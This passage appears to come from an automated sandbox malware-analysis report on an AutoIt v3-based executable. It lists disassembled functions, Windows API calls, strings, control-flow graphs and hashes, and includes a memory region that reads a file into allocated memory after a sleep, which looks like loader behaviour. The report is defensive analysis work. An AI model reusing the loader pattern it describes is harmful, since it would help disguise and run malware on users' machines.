                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 2378138488-0
                                                                  • Opcode ID: 754895701d73b5d1a144c95707a90ab6d11e5f931a9fa02109fe52fac0b2b83e
                                                                  • Instruction ID: e3a9ccdb53f114a701ed2861b5b06f0856e91b556a393d3eb95fcd2f4cdb4972
                                                                  • Opcode Fuzzy Hash: 754895701d73b5d1a144c95707a90ab6d11e5f931a9fa02109fe52fac0b2b83e
                                                                  • Instruction Fuzzy Hash: F0C13CB1D10219AFDF26DF95CC81EDEB7BCAF49314F0080A6F609EA151DB749A848F61
                                                                  Function 00353742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 958 353742-353762 960 353764-353767 958->960 961 3537c2-3537c4 958->961 963 353769-353770 960->963 964 3537c8 960->964 961->960 962 3537c6 961->962 965 3537ab-3537b3 DefWindowProcW 962->965 968 353776-35377b 963->968 969 35382c-353834 PostQuitMessage 963->969 966 3537ce-3537d1 964->966 967 3c1e00-3c1e2e call 352ff6 call 36e312 964->967 971 3537b9-3537bf 965->971 972 3537f6-35381d SetTimer RegisterWindowMessageW 966->972 973 3537d3-3537d4 966->973 1001 3c1e33-3c1e3a 967->1001 975 3c1e88-3c1e9c call 394ddd 968->975 976 353781-353783 968->976 970 3537f2-3537f4 969->970 970->971 972->970 981 35381f-35382a CreatePopupMenu 972->981 978 3c1da3-3c1da6 973->978 979 3537da-3537ed KillTimer call 353847 call 35390f 973->979 975->970 995 3c1ea2 975->995 982 353836-353845 call 36eb83 976->982 983 353789-35378e 976->983 988 3c1ddc-3c1dfb MoveWindow 978->988 989 3c1da8-3c1daa 978->989 979->970 981->970 982->970 984 3c1e6d-3c1e74 983->984 985 353794-353799 983->985 984->965 1000 3c1e7a-3c1e83 call 38a5f3 984->1000 993 3c1e58-3c1e68 call 3955bd 985->993 994 35379f-3537a5 985->994 988->970 997 3c1dac-3c1daf 989->997 998 3c1dcb-3c1dd7 SetFocus 989->998 993->970 994->965 994->1001 995->965 997->994 1002 3c1db5-3c1dc6 call 352ff6 997->1002 998->970 1000->965 1001->965 1006 3c1e40-3c1e53 call 353847 call 354ffc 1001->1006 1002->970 1006->965
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 003537B3
                                                                  • KillTimer.USER32(?,00000001), ref: 003537DD
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00353800
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0035380B
                                                                  • CreatePopupMenu.USER32 ref: 0035381F
                                                                  • PostQuitMessage.USER32(00000000), ref: 0035382E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: c80e387fc5c3d315eafd87ab1724e73b2ccb55f5f3098560f9cbbb8cc9140b2b
                                                                  • Instruction ID: 85d0dd10fee14d2d54409a1128448b0804ed1a78b0951ca54615a96b37b4355c
                                                                  • Opcode Fuzzy Hash: c80e387fc5c3d315eafd87ab1724e73b2ccb55f5f3098560f9cbbb8cc9140b2b
                                                                  • Instruction Fuzzy Hash: 81416BF5A00245A7DB175B68EC4AFBA3B5DF709382F00812AFE12C65F1CB609E589365
                                                                  Function 00353E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00353E79
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00353E88
                                                                  • LoadIconW.USER32(00000063), ref: 00353E9E
                                                                  • LoadIconW.USER32(000000A4), ref: 00353EB0
                                                                  • LoadIconW.USER32(000000A2), ref: 00353EC2
                                                                    • Part of subcall function 00354024: LoadImageW.USER32(00350000,00000063,00000001,00000010,00000010,00000000), ref: 00354048
                                                                  • RegisterClassExW.USER32(?), ref: 00353F30
                                                                    • Part of subcall function 00353F53: GetSysColorBrush.USER32(0000000F), ref: 00353F86
                                                                    • Part of subcall function 00353F53: RegisterClassExW.USER32(00000030), ref: 00353FB0
                                                                    • Part of subcall function 00353F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00353FC1
                                                                    • Part of subcall function 00353F53: InitCommonControlsEx.COMCTL32(?), ref: 00353FDE
                                                                    • Part of subcall function 00353F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00353FEE
                                                                    • Part of subcall function 00353F53: LoadIconW.USER32(000000A9), ref: 00354004
                                                                    • Part of subcall function 00353F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00354013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 1c853cf911860c30c7a85c56dd760ba06868b8e440681de36200b62d5cd4c0b5
                                                                  • Instruction ID: ed1e8cb2ed983b099a512441d349d5ae4a947646cf024fd51083c92fd4236cae
                                                                  • Opcode Fuzzy Hash: 1c853cf911860c30c7a85c56dd760ba06868b8e440681de36200b62d5cd4c0b5
                                                                  • Instruction Fuzzy Hash: 992128B4E00304AFCB01DFA9EC4AAD9BFF5EB48310F10822AE714A62B1D77546448B99
                                                                  Function 00FD9108 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1022 fd9108-fd91b6 call fd6b38 1025 fd91bd-fd91e3 call fda018 CreateFileW 1022->1025 1028 fd91ea-fd91fa 1025->1028 1029 fd91e5 1025->1029 1036 fd91fc 1028->1036 1037 fd9201-fd921b VirtualAlloc 1028->1037 1030 fd9335-fd9339 1029->1030 1031 fd937b-fd937e 1030->1031 1032 fd933b-fd933f 1030->1032 1038 fd9381-fd9388 1031->1038 1034 fd934b-fd934f 1032->1034 1035 fd9341-fd9344 1032->1035 1039 fd935f-fd9363 1034->1039 1040 fd9351-fd935b 1034->1040 1035->1034 1036->1030 1041 fd921d 1037->1041 1042 fd9222-fd9239 ReadFile 1037->1042 1043 fd93dd-fd93f2 1038->1043 1044 fd938a-fd9395 1038->1044 1047 fd9365-fd936f 1039->1047 1048 fd9373 1039->1048 1040->1039 1041->1030 1049 fd923b 1042->1049 1050 fd9240-fd9280 VirtualAlloc 1042->1050 1045 fd93f4-fd93ff VirtualFree 1043->1045 1046 fd9402-fd940a 1043->1046 1051 fd9399-fd93a5 1044->1051 1052 fd9397 1044->1052 1045->1046 1047->1048 1048->1031 1049->1030 1055 fd9287-fd92a2 call fda268 1050->1055 1056 fd9282 1050->1056 1053 fd93b9-fd93c5 1051->1053 1054 fd93a7-fd93b7 1051->1054 1052->1043 1058 fd93c7-fd93d0 1053->1058 1059 fd93d2-fd93d8 1053->1059 1057 fd93db 1054->1057 1062 fd92ad-fd92b7 1055->1062 1056->1030 1057->1038 1058->1057 1059->1057 1063 fd92b9-fd92e8 call fda268 1062->1063 1064 fd92ea-fd92fe call fda078 1062->1064 1063->1062 1070 fd9300 1064->1070 1071 fd9302-fd9306 1064->1071 1070->1030 1072 fd9308-fd930c CloseHandle 1071->1072 1073 fd9312-fd9316 1071->1073 1072->1073 1074 fd9318-fd9323 VirtualFree 1073->1074 1075 fd9326-fd932f 1073->1075 1074->1075 1075->1025 1075->1030
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FD91D9
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FD93FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction ID: 369ed9281cebf0fddcacdbcbd92bd56e5c830aee596a8a980699ad2faa3dc210
                                                                  • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction Fuzzy Hash: 08A11871E04209EBDB14CFE4C898BEEB7B6BF48315F24815AE105BB380D7B59A41EB54
                                                                  Function 003549FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1131 3549fb-354a25 call 35bcce RegOpenKeyExW 1134 3c41cc-3c41e3 RegQueryValueExW 1131->1134 1135 354a2b-354a2f 1131->1135 1136 3c41e5-3c4222 call 36f4ea call 3547b7 RegQueryValueExW 1134->1136 1137 3c4246-3c424f RegCloseKey 1134->1137 1142 3c423d-3c4245 call 3547e2 1136->1142 1143 3c4224-3c423b call 356a63 1136->1143 1142->1137 1143->1142
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00354A1D
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003C41DB
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003C421A
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003C4249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpen
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                  • API String ID: 1586453840-614718249
                                                                  • Opcode ID: 2f087b91a6362cf27f20929a62746ffb2ca39faf0334a16917ad01842bed198c
                                                                  • Instruction ID: a7466d0ccaef5bfd4608b2f816f2688eb6d435c99a70188919b60ae2d4efa470
                                                                  • Opcode Fuzzy Hash: 2f087b91a6362cf27f20929a62746ffb2ca39faf0334a16917ad01842bed198c
                                                                  • Instruction Fuzzy Hash: E2117C71A01108BFEB06ABA4DD86EFF7BBCEF04744F104069F512E61A1EA71AE45DB50
                                                                  Function 003536B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1158 3536b8-353728 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003536E6
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00353707
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 0035371B
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 00353724
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: d7a3d5ade888e5201ed753053cbe93c6cbfd6b0692513ba28e0d82cd5c21d873
                                                                  • Instruction ID: 822d4f971cba0bbee31a03beb865e491c7de387d3ce6db0d91beb9c5a6e11111
                                                                  • Opcode Fuzzy Hash: d7a3d5ade888e5201ed753053cbe93c6cbfd6b0692513ba28e0d82cd5c21d873
                                                                  • Instruction Fuzzy Hash: 06F03A74A412D07AE7315B57AC48EB73E7DD7CAF20F00802BBB04A21B0C1610991CAB8
                                                                  Function 00FD8EE8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1263 fd8ee8-fd9005 call fd6b38 call fd8dd8 CreateFileW 1270 fd900c-fd901c 1263->1270 1271 fd9007 1263->1271 1274 fd901e 1270->1274 1275 fd9023-fd903d VirtualAlloc 1270->1275 1272 fd90bc-fd90c1 1271->1272 1274->1272 1276 fd903f 1275->1276 1277 fd9041-fd9058 ReadFile 1275->1277 1276->1272 1278 fd905c-fd9096 call fd8e18 call fd7dd8 1277->1278 1279 fd905a 1277->1279 1284 fd9098-fd90ad call fd8e68 1278->1284 1285 fd90b2-fd90ba ExitProcess 1278->1285 1279->1272 1284->1285 1285->1272
                                                                  APIs
                                                                    • Part of subcall function 00FD8DD8: Sleep.KERNELBASE(000001F4), ref: 00FD8DE9
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FD8FFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: CRR6TRB744H34P0KA
                                                                  • API String ID: 2694422964-3463989640
                                                                  • Opcode ID: cb411de4fc0232fc41f924c645a727bfccf3b054f599b272238f301e6dd598a4
                                                                  • Instruction ID: 603d5183a7608163e7d3757787a3dc08cd7aba93eca98a5be4ddcdef3053e3e5
                                                                  • Opcode Fuzzy Hash: cb411de4fc0232fc41f924c645a727bfccf3b054f599b272238f301e6dd598a4
                                                                  • Instruction Fuzzy Hash: ED51C331D04258DAEF11EBF4C858BEEBB79AF14300F044199E609BB2C1D7B90B49DBA5
                                                                  Function 00354A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00355374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00411148,?,003561FF,?,00000000,00000001,00000000), ref: 00355392
                                                                    • Part of subcall function 003549FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00354A1D
                                                                  • _wcscat.LIBCMT ref: 003C2D80
                                                                  • _wcscat.LIBCMT ref: 003C2DB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                  • String ID: 8!A$\$\Include\
                                                                  • API String ID: 3592542968-157268276
                                                                  • Opcode ID: 4ff9e9063918e7480f9a1dfcb69c5c02b892569837855d1c1be8a47434472b14
                                                                  • Instruction ID: 8c7dba7393d096cf9cd77ed66316344581051a18968b838a2310c4371f9d6dda
                                                                  • Opcode Fuzzy Hash: 4ff9e9063918e7480f9a1dfcb69c5c02b892569837855d1c1be8a47434472b14
                                                                  • Instruction Fuzzy Hash: 37518175404340AFC716EF65EA82CDAB3F4FE59300B40853EFA45DB261DBB09A58CB5A
                                                                  Function 003551AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0035522F
                                                                  • _wcscpy.LIBCMT ref: 00355283
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00355293
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003C3CB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 1053898822-1585850449
                                                                  • Opcode ID: 9ee028691edbab08b5be99365a7ad56982a8d0ff82346d910cec82fbeda357a6
                                                                  • Instruction ID: 0053f2412585351fb58c40d29294aaaa4879950abcfb3b13649522ddb96bb52f
                                                                  • Opcode Fuzzy Hash: 9ee028691edbab08b5be99365a7ad56982a8d0ff82346d910cec82fbeda357a6
                                                                  • Instruction Fuzzy Hash: 0631A171408740AEC722EB60DC52FDE7BD8AB44311F10891AFA85961B1DB74A64C8B9A
                                                                  Function 00354139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003541A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003539FE,?,00000001), ref: 003541DB
                                                                  • _free.LIBCMT ref: 003C36B7
                                                                  • _free.LIBCMT ref: 003C36FE
                                                                    • Part of subcall function 0035C833: __wsplitpath.LIBCMT ref: 0035C93E
                                                                    • Part of subcall function 0035C833: _wcscpy.LIBCMT ref: 0035C953
                                                                    • Part of subcall function 0035C833: _wcscat.LIBCMT ref: 0035C968
                                                                    • Part of subcall function 0035C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0035C978
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 805182592-1757145024
                                                                  • Opcode ID: ed501be647fa589946237ec9b60fb97a8493a43ff00f096c71e85377d1d60862
                                                                  • Instruction ID: 128078afdbf1fd74fc53cdd1fce967645bcf0050823bab7a8995d7d23be3e7b6
                                                                  • Opcode Fuzzy Hash: ed501be647fa589946237ec9b60fb97a8493a43ff00f096c71e85377d1d60862
                                                                  • Instruction Fuzzy Hash: 8E913C71910219AFCF06EFA5CC91EEEB7B4BF05314F108429E816EB291DB749E54CB90
                                                                  Function 003540E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003C3725
                                                                  • GetOpenFileNameW.COMDLG32 ref: 003C376F
                                                                    • Part of subcall function 0035660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003553B1,?,?,003561FF,?,00000000,00000001,00000000), ref: 0035662F
                                                                    • Part of subcall function 003540A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003540C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X$t3@
                                                                  • API String ID: 3777226403-811511634
                                                                  • Opcode ID: 80d292850c7fd5e73ee4ed828ab99327c6fd77f5254f8612c140aba703285076
                                                                  • Instruction ID: 7d755013b7a8c98a378b8fd904379d0e766fe550d6e05455820c9e29b8025ed8
                                                                  • Opcode Fuzzy Hash: 80d292850c7fd5e73ee4ed828ab99327c6fd77f5254f8612c140aba703285076
                                                                  • Instruction Fuzzy Hash: 1421C671A001989BCB16DF94C845BDE7BFC9F48305F00806AE805FB291DBB85A898F65
                                                                  Function 003734AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getstream.LIBCMT ref: 003734FE
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00373539
                                                                  • __wopenfile.LIBCMT ref: 00373549
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                  • String ID: <G
                                                                  • API String ID: 1820251861-2138716496
                                                                  • Opcode ID: b7d519080c33f07ffd07f0dd6d4eac7acc750d7c393ddbb8f94ee97c6dabe1c0
                                                                  • Instruction ID: d5267fb7ac0260d643847c508c46fc6d9b37e9033801d6d57269edb75b21dd7e
                                                                  • Opcode Fuzzy Hash: b7d519080c33f07ffd07f0dd6d4eac7acc750d7c393ddbb8f94ee97c6dabe1c0
                                                                  • Instruction Fuzzy Hash: 92110A71A0021A9BDB37BF758C4266E36E4AF09760B15C425E41DDF181EB3CCA11E7A1
                                                                  Function 0036D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0036D28B,SwapMouseButtons,00000004,?), ref: 0036D2BC
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0036D28B,SwapMouseButtons,00000004,?,?,?,?,0036C865), ref: 0036D2DD
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0036D28B,SwapMouseButtons,00000004,?,?,?,?,0036C865), ref: 0036D2FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: 696734406a517583783f8cd8ee3108558abfab0d20938609aa774cb80e4812d5
